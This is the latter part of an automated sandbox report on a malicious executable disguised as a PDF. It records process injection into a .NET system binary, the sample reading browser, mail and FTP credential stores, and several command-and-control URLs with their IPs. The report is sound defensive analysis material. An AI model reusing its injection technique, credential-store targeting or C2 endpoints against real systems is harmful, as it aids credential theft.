                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\Project sheets.pdf.exe TID: 5304Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4052Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 60000
                Source: Project sheets.pdf.exe, 00000000.00000002.246724890.000000000437C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
                Source: Project sheets.pdf.exe, 00000000.00000002.246969178.000000000440D000.00000004.00000800.00020000.00000000.sdmp, Project sheets.pdf.exe, 00000000.00000002.246906409.00000000043C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
                Source: Project sheets.pdf.exe, 00000000.00000002.246471391.00000000042C7000.00000004.00000800.00020000.00000000.sdmp, Project sheets.pdf.exe, 00000000.00000002.246636872.000000000431E000.00000004.00000800.00020000.00000000.sdmp, Project sheets.pdf.exe, 00000000.00000002.246236248.00000000041EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
                Source: Project sheets.pdf.exe, 00000000.00000002.247111650.0000000004455000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 401000
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 415000
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 41A000
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 4A0000
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 4CF1008
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeQueries volume information: C:\Users\user\Desktop\Project sheets.pdf.exe VolumeInformation
                Source: C:\Users\user\Desktop\Project sheets.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00406069 GetUserNameW,

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000003.00000002.501322554.0000000005046000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 3896, type: MEMORYSTR
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Project sheets.pdf.exe PID: 5648, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: PopPassword
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: SmtpPassword
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000003.00000002.501322554.0000000005046000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cvtres.exe PID: 3896, type: MEMORYSTR
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Project sheets.pdf.exe PID: 5648, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management InstrumentationPath Interception1
                Access Token Manipulation
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                Account Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium3
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                Process Injection
                11
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                1
                File and Directory Discovery
                Remote Desktop Protocol2
                Data from Local System
                Exfiltration Over Bluetooth1
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)13
                Obfuscated Files or Information
                2
                Credentials in Registry
                13
                System Information Discovery
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration3
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
                Software Packing
                NTDS11
                Security Software Discovery
                Distributed Component Object Model1
                Input Capture
                Scheduled Transfer113
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
                Masquerading
                LSA Secrets1
                Process Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common21
                Virtualization/Sandbox Evasion
                Cached Domain Credentials21
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Access Token Manipulation
                DCSync1
                System Owner/User Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job311
                Process Injection
                Proc Filesystem1
                Remote System Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Project sheets.pdf.exe100%Joe Sandbox ML
                No Antivirus matches
                SourceDetectionScannerLabelLinkDownload
                3.0.cvtres.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.cvtres.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.Project sheets.pdf.exe.41d5530.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.2.cvtres.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.cvtres.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.cvtres.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.cvtres.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.cvtres.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://tixfilmz.gq/Devil/PWS/fre.php100%Avira URL Cloudmalware
                https://tixfilmz.gq/Devil/PWS/fre.php0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                tixfilmz.gq
                188.114.97.3
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  http://kbfvzoboss.bid/alien/fre.phptrue
                  • URL Reputation: safe
                  unknown
                  http://alphastand.win/alien/fre.phptrue
                  • URL Reputation: safe
                  unknown
                  http://alphastand.trade/alien/fre.phptrue
                  • URL Reputation: safe
                  unknown
                  http://alphastand.top/alien/fre.phptrue
                  • URL Reputation: safe
                  unknown
                  http://tixfilmz.gq/Devil/PWS/fre.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.ibsensoftware.com/cvtres.exe, cvtres.exe, 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://tixfilmz.gq/Devil/PWS/fre.phpcvtres.exe, 00000003.00000002.500737023.000000000049F000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  188.114.97.3
                  tixfilmz.gqEuropean Union
                  13335CLOUDFLARENETUStrue
                  188.114.96.3
                  unknownEuropean Union
                  13335CLOUDFLARENETUStrue
                  IP
                  192.168.2.1
                  Joe Sandbox Version:35.0.0 Citrine
                  Analysis ID:682148
                  Start date and time:2022-08-11 06:41:08 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 44s
                  Hypervisor based Inspection enabled:false
                  Report type:light
